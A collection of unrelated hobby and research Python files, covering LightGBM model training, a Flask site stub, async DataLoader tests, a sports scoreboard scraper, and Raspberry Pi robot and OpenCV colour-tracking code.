#### File: JoshCullinan/CCLDP/Code_submission.py
```python
import numpy as np
import pandas as pd
import math
import re
import time
import gc
import matplotlib.pyplot as plt
import seaborn as sns
def Model_Explore(trial_reg):
#Collect the feature importance, sort feature importance and the select the top 2-22 features
features = pd.DataFrame(index = trial_reg.feature_name(), data = trial_reg.feature_importance(importance_type='split'), columns = ['Feature_Weight'])
features.sort_values(by = 'Feature_Weight', ascending = False, inplace=True)
top100 = features.iloc(axis=0)[2:22]
#Create df for feature importance
top100.reset_index(inplace = True)
top100.columns = ['Feature', 'Feature Weight']
#Create seaborn plot
sns.set_style("whitegrid")
sns.set_context("paper")
plot = sns.barplot(x="Feature Weight", y="Feature", palette = "mako", data=top100.sort_values(by="Feature Weight", ascending=False))
return plot
if __name__ == '__main__':
#Create relative path names
import os
dirname = os.path.dirname(__file__)
#Neptune.ai for monitoring
import neptune
neptune.init(project_qualified_name='clljos001/CCLDP',
                 api_token='<KEY>')  # token redacted; closes the neptune.init(...) call
'''
This Code is usually used to import the omics datasets, feature engineer, and feature select.
It has been commented out for brevity, and speed up this training script.
Typically if the X & y set already exists it won't run.
'''
#Load in data, perform basic data manipulation, feature selection and removal of erroneous data.
#import Ingest
#files_to_imp = 'E'
#features_to_imp = 500
#X, y = Ingest.Ingest(files_to_imp, features_to_imp)
#Load in data
X = pd.read_csv(os.path.join(dirname,'X'))
y = pd.read_csv(os.path.join(dirname, 'y'))
X.drop(columns='Unnamed: 0', inplace = True)
y.drop(columns='Unnamed: 0', inplace = True)
X.loc(axis=1)['PUTATIVE_TARGET'] = X.loc(axis=1)['PUTATIVE_TARGET'].astype('category')
X.loc(axis=1)['DRUG_NAME'] = X.loc(axis=1)['DRUG_NAME'].astype('category')
#Create a test, validation and train set
print("\nCreating test, train, and validation datasets")
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 12345, test_size=0.1, shuffle = True, stratify = X.loc(axis=1)['DRUG_NAME'])
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, random_state = 12345, test_size=0.11, shuffle = True, stratify = X_train.loc(axis=1)['DRUG_NAME'])
#LGB datasets are used for model training.
import lightgbm as lgb
train = lgb.Dataset(X_train, label = y_train, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET'])
test = lgb.Dataset(X_test, label = y_test, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET'])
val = lgb.Dataset(X_val, label = y_val, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET'])
print("Complete")
#Delete X and y to free up memory. This step isn't done in the code to cross validate.
#del X, y
#take out the trash to free up memory
gc.collect()
#### Train a single LightGBM Model####
from sklearn.metrics import mean_squared_error as mse
from sklearn.metrics import r2_score
#This dictionary is the parameter list for the model we will be training.
p = {
#'max_depth' : -1, #default = -1, no limit
'max_bin' : 500, #default = 255
#'num_leaves' : 15, #Default = 31 #XGBoost behav = 2^depth - 1
'boosting' : 'gbdt', #Default = gdbt
'metric' : 'rmse',
'num_threads' : -1,
'force_col_wise': True,
#'use_missing' : False, #default = True
'learning_rate' : 0.08, #default = 0.1
#'feature_fraction' : 0.75,
#'lambda_l1' : 0, #default = 0
#'lambda_l2' : 0, #Default = 0
'cat_smooth' : 150, #Default = 10
'cat_l2': 300, #default = 10
'min_data_per_group' : 150, #default = 100
'max_cat_threshold' : 200, #default = 32
'min_data_in_leaf' : 10, #default = 20
#'extra_trees' : True, #default = False
#'subsample' : 1.0, #Default = 1
#'colsample_bytree' : 0.5,
#'bagging_fraction' : 0.75, #Default = 1, used to deal with overfitting
#'bagging_freq' : 100, #Default = 0, used to deal with overfitting in conjunction with bagging_fraction.
#'path_smooth' : 150,
}
#This links to neptune.ai to monitor the training of the model.
#Go to this link to the see the experiment: https://ui.neptune.ai/clljos001/CCLDP
neptune.create_experiment(name="CCL_DP", tags=['Desktop', 'Example_Code'], params=p)
trial_reg = lgb.train(
params = p, #Parameter dictionary
train_set = train, #Train set created earlier
num_boost_round=20000, #How many rounds to train for unless early stopping is reached
valid_sets = [val], #Set to validate on
valid_names = ['Validation'],
feature_name = 'auto',
categorical_feature = 'auto',
early_stopping_rounds = 150, #If not performance improvements for 150 rounds then stop.
verbose_eval = 50, #Tell us how the training is doing every 50 rounds.
)
#Save the model we just trained
trial_reg.save_model('LightGBM_Model')
###Performance Metrics & Logging to Neptune.ai###
test_pred = trial_reg.predict(X_test)
r2_test = r2_score(y_test,test_pred)
neptune.log_metric('Test R2', r2_test)
val_pred = trial_reg.predict(X_val)
r2_val = r2_score(y_val,val_pred)
neptune.log_metric('Validation R2', r2_val)
train_pred = trial_reg.predict(X_train)
r2_train = r2_score(y_train, train_pred)
neptune.log_metric('Train R2', r2_train)
print('R2 for Test: ', r2_test, '\nR2 for Validation: ', r2_val, '\nR2 for Train: ', r2_train)
rmse_test = math.sqrt(mse(y_test, test_pred))
print("RMSE for Test: ", rmse_test)
neptune.log_metric('test rmse', rmse_test)
rmse_train = math.sqrt(mse(y_train, train_pred))
print("RMSE for Train: ", rmse_train)
    neptune.log_metric('Train rmse', rmse_train)
#Close the neptune uplink
neptune.stop()
#Print the model's feature importance excluding drug_name and drug_target
print(Model_Explore(trial_reg))
```
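To reuse the model saved above in a separate script, one possible sketch (not part of the submission code; the new feature file name is hypothetical):
```python
import lightgbm as lgb
import pandas as pd

booster = lgb.Booster(model_file='LightGBM_Model')  # load the model saved by the training run
X_new = pd.read_csv('X_new.csv')                    # hypothetical feature matrix with the same columns as X
# note: categorical columns (e.g. DRUG_NAME, PUTATIVE_TARGET) should be cast to 'category' as in training
predictions = booster.predict(X_new)
```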
{
"source": "joshcurll/website",
"score": 3
}
#### File: website/web/app.py
```python
from datetime import datetime
from flask import Flask
from flask import render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# using sqlite for testing
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
db = SQLAlchemy(app)
# this class along with any others should be in separate files
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True, nullable=False)
email = db.Column(db.String(50), unique=True, nullable=False)
image_file = db.Column(db.String(20),
nullable=False,
default='default.jpg')
# obviously we will want to move this to another table
password = db.Column(db.String(100), nullable=False)
posts = db.relationship('Post', backref='author', lazy=True)
def __repr__(self):
return f"User('{self.username}', '{self.email}', '{self.image_file}')"
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), nullable=False)
date_posted = db.Column(db.DateTime, nullable=False,
default=datetime.utcnow)
content = db.Column(db.Text, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.title}', '{self.date_posted}')"
announcements = [{
'title': 'First Announcement',
'date_posted': '11 July 2018',
'content': 'First Announcement Posted for Testing'
},
{
'title': 'Second Announcement',
'date_posted': '12 July 2018',
'content': 'Second Announcement Posted.'
}]
@app.route('/')
def index_page():
return render_template('index.html', announcements=announcements)
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
return render_template('hello.html', name=name)
@app.route('/members')
def members():
return render_template('members.html')
@app.route('/projects/')
def projects():
return render_template('projects.html')
@app.route('/login')
def login_page():
return render_template('login-page.html')
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
```
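The models above are defined but never migrated; a minimal bootstrap sketch for local testing (a hypothetical helper, assuming the file is importable as `app`) might look like:
```python
# bootstrap_db.py -- hypothetical helper, not part of the original repo
from app import app, db, User

with app.app_context():
    db.create_all()  # create site.db with the user and post tables
    db.session.add(User(username='admin', email='admin@example.com', password='change-me'))
    db.session.commit()
```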
{
"source": "joshcurtis/aiodataloader",
"score": 2
}
#### File: joshcurtis/aiodataloader/test_aiodataloader.py
```python
import pytest
from asyncio import gather
from functools import partial
from pytest import raises
from aiodataloader import DataLoader
pytestmark = pytest.mark.asyncio
async def do_test():
return True
def id_loader(**options):
load_calls = []
async def default_resolve(x):
return x
resolve = options.pop('resolve', default_resolve)
async def fn(keys):
load_calls.append(keys)
return await resolve(keys)
# return keys
identity_loader = DataLoader(fn, **options)
return identity_loader, load_calls
async def test_build_a_simple_data_loader():
async def call_fn(keys):
return keys
identity_loader = DataLoader(call_fn)
promise1 = identity_loader.load(1)
value1 = await promise1
assert value1 == 1
async def test_can_build_a_data_loader_from_a_partial():
value_map = {1: 'one'}
async def call_fn(context, keys):
return [context.get(key) for key in keys]
partial_fn = partial(call_fn, value_map)
identity_loader = DataLoader(partial_fn)
promise1 = identity_loader.load(1)
value1 = await promise1
assert value1 == 'one'
async def test_supports_loading_multiple_keys_in_one_call():
async def call_fn(keys):
return keys
identity_loader = DataLoader(call_fn)
promise_all = identity_loader.load_many([1, 2])
values = await promise_all
assert values == [1, 2]
promise_all = identity_loader.load_many([])
values = await promise_all
assert values == []
async def test_batches_multiple_requests():
identity_loader, load_calls = id_loader()
promise1 = identity_loader.load(1)
promise2 = identity_loader.load(2)
p = gather(promise1, promise2)
value1, value2 = await p
assert value1 == 1
assert value2 == 2
assert load_calls == [[1, 2]]
async def test_batches_multiple_requests_with_max_batch_sizes():
identity_loader, load_calls = id_loader(max_batch_size=2)
promise1 = identity_loader.load(1)
promise2 = identity_loader.load(2)
promise3 = identity_loader.load(3)
p = gather(promise1, promise2, promise3)
value1, value2, value3 = await p
assert value1 == 1
assert value2 == 2
assert value3 == 3
assert load_calls == [[1, 2], [3]]
async def test_coalesces_identical_requests():
identity_loader, load_calls = id_loader()
promise1 = identity_loader.load(1)
promise2 = identity_loader.load(1)
assert promise1 == promise2
p = gather(promise1, promise2)
value1, value2 = await p
assert value1 == 1
assert value2 == 1
assert load_calls == [[1]]
async def test_caches_repeated_requests():
identity_loader, load_calls = id_loader()
a, b = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a == 'A'
assert b == 'B'
assert load_calls == [['A', 'B']]
a2, c = await gather(
identity_loader.load('A'),
identity_loader.load('C')
)
assert a2 == 'A'
assert c == 'C'
assert load_calls == [['A', 'B'], ['C']]
a3, b2, c2 = await gather(
identity_loader.load('A'),
identity_loader.load('B'),
identity_loader.load('C')
)
assert a3 == 'A'
assert b2 == 'B'
assert c2 == 'C'
assert load_calls == [['A', 'B'], ['C']]
async def test_clears_single_value_in_loader():
identity_loader, load_calls = id_loader()
a, b = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a == 'A'
assert b == 'B'
assert load_calls == [['A', 'B']]
identity_loader.clear('A')
a2, b2 = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a2 == 'A'
assert b2 == 'B'
assert load_calls == [['A', 'B'], ['A']]
async def test_clears_all_values_in_loader():
identity_loader, load_calls = id_loader()
a, b = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a == 'A'
assert b == 'B'
assert load_calls == [['A', 'B']]
identity_loader.clear_all()
a2, b2 = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a2 == 'A'
assert b2 == 'B'
assert load_calls == [['A', 'B'], ['A', 'B']]
async def test_allows_priming_the_cache():
identity_loader, load_calls = id_loader()
identity_loader.prime('A', 'A')
a, b = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a == 'A'
assert b == 'B'
assert load_calls == [['B']]
async def test_does_not_prime_keys_that_already_exist():
identity_loader, load_calls = id_loader()
identity_loader.prime('A', 'X')
a1 = await identity_loader.load('A')
b1 = await identity_loader.load('B')
assert a1 == 'X'
assert b1 == 'B'
identity_loader.prime('A', 'Y')
identity_loader.prime('B', 'Y')
a2 = await identity_loader.load('A')
b2 = await identity_loader.load('B')
assert a2 == 'X'
assert b2 == 'B'
assert load_calls == [['B']]
# # Represents Errors
async def test_resolves_to_error_to_indicate_failure():
async def resolve(keys):
mapped_keys = [
key if key % 2 == 0 else Exception("Odd: {}".format(key))
for key in keys
]
return mapped_keys
even_loader, load_calls = id_loader(resolve=resolve)
with raises(Exception) as exc_info:
await even_loader.load(1)
assert str(exc_info.value) == "Odd: 1"
value2 = await even_loader.load(2)
assert value2 == 2
assert load_calls == [[1], [2]]
async def test_can_represent_failures_and_successes_simultaneously():
async def resolve(keys):
mapped_keys = [
key if key % 2 == 0 else Exception("Odd: {}".format(key))
for key in keys
]
return mapped_keys
even_loader, load_calls = id_loader(resolve=resolve)
promise1 = even_loader.load(1)
promise2 = even_loader.load(2)
with raises(Exception) as exc_info:
await promise1
assert str(exc_info.value) == "Odd: 1"
value2 = await promise2
assert value2 == 2
assert load_calls == [[1, 2]]
async def test_caches_failed_fetches():
async def resolve(keys):
mapped_keys = [
Exception("Error: {}".format(key))
for key in keys
]
return mapped_keys
error_loader, load_calls = id_loader(resolve=resolve)
with raises(Exception) as exc_info:
await error_loader.load(1)
assert str(exc_info.value) == "Error: 1"
with raises(Exception) as exc_info:
await error_loader.load(1)
assert str(exc_info.value) == "Error: 1"
assert load_calls == [[1]]
async def test_caches_failed_fetches_2():
identity_loader, load_calls = id_loader()
identity_loader.prime(1, Exception("Error: 1"))
with raises(Exception) as exc_info:
await identity_loader.load(1)
assert load_calls == []
# It is resilient to job queue ordering
async def test_batches_loads_occuring_within_promises():
identity_loader, load_calls = id_loader()
async def load_b_1():
return await load_b_2()
async def load_b_2():
return await identity_loader.load('B')
values = await gather(
identity_loader.load('A'),
load_b_1()
)
assert values == ['A', 'B']
assert load_calls == [['A', 'B']]
async def test_catches_error_if_loader_resolver_fails():
exc = Exception("AOH!")
def do_resolve(x):
raise exc
a_loader, a_load_calls = id_loader(resolve=do_resolve)
with raises(Exception) as exc_info:
await a_loader.load('A1')
assert exc_info.value == exc
async def test_can_call_a_loader_from_a_loader():
deep_loader, deep_load_calls = id_loader()
a_loader, a_load_calls = id_loader(resolve=lambda keys:deep_loader.load(tuple(keys)))
b_loader, b_load_calls = id_loader(resolve=lambda keys:deep_loader.load(tuple(keys)))
a1, b1, a2, b2 = await gather(
a_loader.load('A1'),
b_loader.load('B1'),
a_loader.load('A2'),
b_loader.load('B2')
)
assert a1 == 'A1'
assert b1 == 'B1'
assert a2 == 'A2'
assert b2 == 'B2'
assert a_load_calls == [['A1', 'A2']]
assert b_load_calls == [['B1', 'B2']]
assert deep_load_calls == [[('A1', 'A2'), ('B1', 'B2')]]
async def test_dataloader_clear_with_missing_key_works():
async def do_resolve(x):
return x
a_loader, a_load_calls = id_loader(resolve=do_resolve)
assert a_loader.clear('A1') == a_loader
```
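For reference, a minimal sketch (not part of the test suite) of the pattern these tests exercise: a batch-load coroutine wrapped in a DataLoader, with concurrent loads coalescing into a single batch call:
```python
import asyncio
from aiodataloader import DataLoader

async def batch_load(keys):
    # called once per batch; must return results in the same order as keys
    return [f"user:{key}" for key in keys]

async def main():
    loader = DataLoader(batch_load)
    # both loads are scheduled in the same tick, so batch_load receives [1, 2]
    a, b = await asyncio.gather(loader.load(1), loader.load(2))
    print(a, b)

asyncio.run(main())
```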
{
"source": "joshcvt/icsMiddleman",
"score": 2
}
#### File: joshcvt/icsMiddleman/app.py
```python
from chalice import Chalice, Response
from chalicelib.middleman import do_milb
import icalendar
app = Chalice(app_name='icsMiddleman')
@app.route('/')
def index():
return {'hello': 'world'}
@app.route('/milb/{teamtoken}')
def get_milb(teamtoken):
return Response(body=do_milb(teamtoken),
status_code=200,
headers={'Content-Type': 'text/calendar'})
```
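For a quick local check, Chalice's test client can exercise the route in-process; this is a hedged sketch (it requires a Chalice version that ships `chalice.test`, and the team token is illustrative):
```python
from chalice.test import Client
from app import app

with Client(app) as client:
    response = client.http.get('/milb/syracuse-mets')  # team token is only an example
    print(response.status_code, response.headers.get('Content-Type'))
```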
{
"source": "joshcvt/resetter",
"score": 3
}
#### File: resetter/chalicelib/ncaaf_espn.py
```python
import urllib.request, urllib.error, urllib.parse, json, traceback, time
from datetime import datetime, timedelta
from .reset_lib import joinOr, sentenceCap, NoGameException, NoTeamException, toOrdinal
from .ncaa_espn_lib import ncaaNickDict, displayOverrides, iaa, validFbSet
SCOREBOARD_ROOT_URL = "http://site.api.espn.com/apis/site/v2/sports/football/college-football/scoreboard"
# start with this to get weeks, then customize for this week and full scoreboard
#http://site.api.espn.com/apis/site/v2/sports/football/college-football/scoreboard?week=4&groups=80&limit=388&1577314600
# global for caching
__MOD = {}
# cache time for scoreboard
CACHE_INTERVAL = timedelta(minutes=1)
def get_scoreboard(file=None,iaa=False,debug=False):
"""Get scoreboard from site, or from file if specified for testing."""
FBS_GROUPS = "80"
FCS_GROUPS = "81"
SB_FORMAT_TAIL = '?week=%s&groups=%s&limit=388&%s'
if file:
print ("Using scoreboard from file: " + file)
with open(file) as f:
sb = json.load(f)
else:
if debug:
print("Root: " + SCOREBOARD_ROOT_URL)
try:
scoreboardWeekUrl = "unconstructed"
with urllib.request.urlopen(SCOREBOARD_ROOT_URL) as fh:
sb = json.load(fh)
now = datetime.now()
for week in sb['leagues'][0]['calendar'][0]['entries']:
if datetime.strptime(week['endDate'],'%Y-%m-%dT%H:%MZ') > now:
weekValue = week['value']
break
# scoreboardWeekUrl = SCOREBOARD_ROOT_URL + "?week=" + str(weekValue) + "&groups=" + FBS_GROUPS + "&limit=388&" + now.timestamp().__str__()
if iaa:
scoreboardWeekUrl = SCOREBOARD_ROOT_URL + SB_FORMAT_TAIL % (str(weekValue), FCS_GROUPS, now.timestamp().__str__())
else:
scoreboardWeekUrl = SCOREBOARD_ROOT_URL + SB_FORMAT_TAIL % (str(weekValue), FBS_GROUPS, now.timestamp().__str__())
if debug:
print("URL: " + scoreboardWeekUrl)
with urllib.request.urlopen(scoreboardWeekUrl) as fh:
sb = json.load(fh)
except urllib.error.HTTPError as e:
if e.code == 404:
raise NoGameException("Scoreboard HTTP 404. This probably means the season is over. Root = " + SCOREBOARD_ROOT_URL + ", week " + scoreboardWeekUrl + "\n")
else:
raise e
except Exception as e:
raise e
        # no explicit close needed: the "with" blocks above manage both urlopen handles
return sb
def find_game(sb,team):
"""Passed scoreboard dict and team string, get game."""
for event in sb['events']:
if test_game(event,team):
return event
return None
def test_game(game,team):
"""Broken out so we can test for all kinds of variations once we build the variation list."""
return (team.lower() in [game["competitions"][0]["competitors"][0]["team"]["location"].lower(),
game["competitions"][0]["competitors"][1]["team"]["location"].lower(),
game["competitions"][0]["competitors"][0]["team"]["displayName"].lower(),
game["competitions"][0]["competitors"][1]["team"]["displayName"].lower(),
game["competitions"][0]["competitors"][0]["team"]["abbreviation"].lower(),
game["competitions"][0]["competitors"][1]["team"]["abbreviation"].lower()])
def game_loc(game):
return "in " + game["competitions"][0]["venue"]["address"]["city"]
# probably want to get stadium and city for neutral-site games
def rank_name(team):
#return # could also be displayName which is full name
pref = team["team"]["location"]
#if pref.lower() in displayOverrides: pref = displayOverrides[raw.lower()]
if team["curatedRank"]['current'] == 99:
return pref
else:
return "#" + str(team["curatedRank"]['current']) + " " + pref
def scoreline(game):
# flip home first if they're leading, otherwise away-first convention if it's tied
t1 = game["competitions"][0]["competitors"][0]
t2 = game["competitions"][0]["competitors"][1]
if int(t1["score"]) > int(t2["score"]):
gleader = t1
gtrailer = t2
else:
gleader = t2
gtrailer = t1
return (rank_name(gleader) + " " + gleader["score"].strip() + ", " + rank_name(gtrailer) + " " + gtrailer["score"].strip())
def spaceday(game,sayToday=False):
(now, utcnow) = (datetime.now(),datetime.utcnow())
utcdiff = (utcnow - now).seconds
startLocal = datetime.strptime(game['competitions'][0]['startDate'], "%Y-%m-%dT%H:%MZ") - timedelta(seconds=utcdiff)
if startLocal.date() == now.date():
if sayToday:
return ' today'
else:
return ''
else:
return ' ' + startLocal.strftime("%A")
def status(game):
if game == None:
return None
statusnode = game["competitions"][0]["status"]
if statusnode["type"]["name"] == "STATUS_FINAL":
status = "Final " + game_loc(game) + ", " + scoreline(game)
if statusnode["type"]["detail"].endswith("OT)"):
status += statusnode["type"]["detail"].split("/")[1]
status += "."
elif statusnode["type"]["name"] == "STATUS_SCHEDULED":
status = rank_name(game["competitions"][0]['competitors'][1]) + " plays " + rank_name(game["competitions"][0]['competitors'][0]) + " at " + game["status"]["type"]["shortDetail"].split(' - ')[1] + spaceday(game) + " " + game_loc(game) + "."
else:
status = scoreline(game)
if statusnode["type"]["name"] == "STATUS_HALFTIME":
status += " at halftime "
elif statusnode["type"]["name"] == "STATUS_IN_PROGRESS" and statusnode["type"]["detail"].endswith("OT"):
status += " in " + statusnode["type"]["detail"] + " "
elif (statusnode["type"]["name"] == "STATUS_END_PERIOD") or ((statusnode["type"]["name"] == "STATUS_IN_PROGRESS") and (statusnode["displayClock"].strip() == "0:00")):
status += ", end of the " + toOrdinal(statusnode["period"]) + " quarter "
elif (statusnode["type"]["name"] == "STATUS_IN_PROGRESS") and (statusnode["displayClock"].strip() == "15:00"):
status += ", start of the " + toOrdinal(statusnode["period"]) + " quarter "
elif statusnode["type"]["name"] == "STATUS_IN_PROGRESS":
status += ", " + statusnode["displayClock"].strip() + " to go in the " + toOrdinal(statusnode["period"]) + " quarter "
else: # just dump it
status += ", " + statusnode["type"]["name"] + ' '
status += game_loc(game) + "."
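    # the block below is guarded by "if 0" and never runs; it appears to be leftover
    # handling for cancelled/postponed/delayed games, kept for reference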
if 0:
if 1:
pass
elif game["gameState"] in ("cancelled","postponed"):
status = rank_name(game["away"]) + " vs. " + rank_name(game["home"]) + " originally scheduled for" + spaceday(game,sayToday=True) + " " + game_loc(game) + " is " + game["gameState"] + "."
elif game["gameState"] in ("delayed"):
status = rank_name(game["away"]) + " vs. " + rank_name(game["home"]) + " " + game_loc(game) + " is " + game["gameState"] + "."
return sentenceCap(status)
def get(team,forceReload=False,debug=False,file=None):
global __MOD
tkey = team.lower().strip()
if debug:
print("tkey: " + tkey + ", ", end="")
if (tkey in iaa) or (tkey in ncaaNickDict and ncaaNickDict[tkey] in iaa):
# we're going to be lazy about caching and just always reload for I-AA games
if debug:
print ("I-AA load: ", end="")
sb = get_scoreboard(iaa=True,debug=debug)
elif tkey not in validFbSet:
raise NoTeamException(tkey + " is not a valid team.")
else: # main I-A schedule cycle
if forceReload \
or ("ncaafsb" not in __MOD) \
or (("ncaafsbdt" in __MOD) and (datetime.utcnow() - __MOD["ncaafsbdt"] > CACHE_INTERVAL)) \
or (("ncaafsb" in __MOD) and (("ncaaffile" not in __MOD) or (file != __MOD["ncaaffile"]))):
if debug:
print ("fresh load: ", end="")
__MOD["ncaaffile"] = file
__MOD["ncaafsb"] = get_scoreboard(debug=debug,file=file)
__MOD["ncaafsbdt"] = datetime.utcnow()
else:
if debug:
print ("cached: ", end="")
pass
sb = __MOD["ncaafsb"]
game = find_game(sb,team)
if game:
return status(game)
elif (tkey in ncaaNickDict):
if (ncaaNickDict[tkey].__class__ == list):
return "For " + team + ", please choose " + joinOr(ncaaNickDict[tkey]) + "."
else:
game = find_game(sb,ncaaNickDict[tkey])
if game:
return status(game)
# fallthru
ret = "No game this week for " + team
if ret[-1] != ".":
ret += "."
raise NoGameException(ret)
```
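A small sketch (not in the module) of the intended call pattern; the team name is purely illustrative:
```python
from chalicelib.ncaaf_espn import get
from chalicelib.reset_lib import NoGameException, NoTeamException

try:
    print(get("Georgia Tech", debug=True))
except (NoGameException, NoTeamException) as e:
    print(e)
```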
{
"source": "joshdabosh/autopack",
"score": 3
}
#### File: autopack/finished/phase-35-final.py
```python
from picamera.array import PiRGBArray
from picamera import PiCamera
import RPi.GPIO as GPIO
import cv2
import numpy as np
import movements
import time
def find_pos(x):
x_cent = 320
if x > x_cent:
direction = 'right'
else:
direction = 'left'
return direction
def main():
robot = movements.robot()
camera = PiCamera()
camera.resolution = (640, 480)
camera.framerate = 50
camera.hflip = True
camera.vflip = True
rawCapture = PiRGBArray(camera, size=(640, 480))
time.sleep(0.1)
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
image = frame.array
blur = cv2.GaussianBlur(image, (3,3), 0)
lower = np.array([3,9,114], dtype="uint8")
upper = np.array([43, 49, 154], dtype="uint8")
thresh = cv2.inRange(blur, lower, upper)
thresh2 = thresh.copy()
image, contours, hierarchy = cv2.findContours(thresh,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
max_area = 0
best_cent = 1
detected = False
for cent in contours:
area = cv2.contourArea(cent)
if area > max_area:
max_area = area
best_cent = cent
detected = True
M = cv2.moments(best_cent)
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
cv2.circle(blur,(cx,cy),10,(0,0,255), -1)
cv2.imshow('Tracking', blur)
direction = find_pos(cx)
if detected == True:
#print '{}'.format(direction)
dist = int(robot.scan_for_obstacles())
if direction == 'left':
if dist < 30:
robot.left()
else:
robot.left_forward()
else:
if dist < 30:
robot.right()
else:
robot.right_forward()
else:
#print 'nuttin'
robot.pause()
blah = cv2.waitKey(1) & 0xFF
rawCapture.truncate(0)
if blah == ord("q"):
break
if __name__ == '__main__':
main()
GPIO.cleanup()
```
#### File: autopack/open_cv/color-tracking.py
```python
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
import numpy as np
# set the text font
font = cv2.FONT_HERSHEY_SIMPLEX
# set the center of the frame for x and y
x_cent = 320
y_cent = 240
# determine the relative position the detected point is at to the camera
def find_dir(x):
if x > x_cent:
direction = 'right'
else:
direction = 'left'
return direction
# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = (640, 480)
camera.framerate = 50
camera.hflip = True
rawCapture = PiRGBArray(camera, size=(640, 480))
# allow the camera to warmup
time.sleep(0.1)
# capture frames from the camera
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image, then initialize the timestamp
# and occupied/unoccupied text
image = frame.array
blur = cv2.blur(image, (3,3))
#hsv to complicate things, or stick with BGR
#hsv = cv2.cvtColor(blur,cv2.COLOR_BGR2HSV)
#thresh = cv2.inRange(hsv,np.array((0, 200, 200)), np.array((20, 255, 255)))
lower = np.array([3, 9, 114],dtype="uint8")
upper = np.array([43, 49, 154], dtype="uint8")
thresh = cv2.inRange(blur, lower, upper)
thresh2 = thresh.copy()
# find contours in the threshold image
image, contours, hierarchy = cv2.findContours(thresh,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
# finding contour with maximum area and store it as best_cnt
max_area = 0
best_cnt = 1
for cnt in contours:
area = cv2.contourArea(cnt)
if area > max_area:
max_area = area
best_cnt = cnt
# finding centroids of best_cnt and draw a circle there
M = cv2.moments(best_cnt)
cx,cy = int(M['m10']/M['m00']), int(M['m01']/M['m00'])
cv2.circle(blur,(cx,cy),10,(0,0,255),-1)
# draws a line to the object
cv2.line(blur,(cx,cy),((cx-25),(cy-25)),(0,0,255), 2)
# finds the relative direction
direction = find_dir(cx)
# displays the location of the detected color
cv2.putText(blur, ('{0}'.format(direction)), ((cx-30), (cy-30)), font, 0.8, (0,255,0), 2, cv2.LINE_AA)
# show the frame
cv2.imshow("Frame", blur)
#cv2.imshow('thresh',thresh2)
key = cv2.waitKey(1) & 0xFF
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
```
#### File: autopack/phase-2/phase-2-1_11_2018.py
```python
import RPi.GPIO as GPIO
import curses
import time
global distance
distance = 11
TRIG = 24
ECHO = 26
screen = curses.initscr()
curses.noecho()
curses.cbreak()
screen.keypad(True)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.OUT) # motor 1, forward, top right
GPIO.setup(11, GPIO.OUT) # motor 1, backward, top right
GPIO.setup(13, GPIO.OUT) # motor 2, forward, top left
GPIO.setup(15, GPIO.OUT) # motor 2, backward, top left
GPIO.setup(12, GPIO.OUT) # motor 3, forward, bottom right
GPIO.setup(16, GPIO.OUT) # motor 3, backward, bottom right
GPIO.setup(18, GPIO.OUT) # motor 4, forward, bottom left
GPIO.setup(22, GPIO.OUT) # motor 4, backward, bottom left
GPIO.setup(TRIG, GPIO.OUT) # trigger voltage setup
GPIO.setup(ECHO, GPIO.IN) # echo input setup
GPIO.output(7, False) # set everything to false at startup
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(TRIG, False)
def forward():
screen.addstr(0,0, 'up ')
GPIO.output(7, False) # makes sure that nothing else
GPIO.output(11, False) # is running when this runs
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(7, True)
GPIO.output(13, True)
GPIO.output(12, True)
GPIO.output(18, True)
def backward():
screen.addstr(0,0,'down ')
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(11, True)
GPIO.output(15, True)
GPIO.output(16, True)
GPIO.output(22, True)
def left():
screen.addstr(0,0,'left ')
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(11, True)
GPIO.output(16, True)
#GPIO.output(13, True)
GPIO.output(18, True)
def right():
screen.addstr(0,0, 'right')
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(7, True)
GPIO.output(15, True)
#GPIO.output(12, True)
GPIO.output(22, True)
def stop():
screen.addstr(0,0,'stop ')
GPIO.output(7, False)
GPIO.output(11, False)
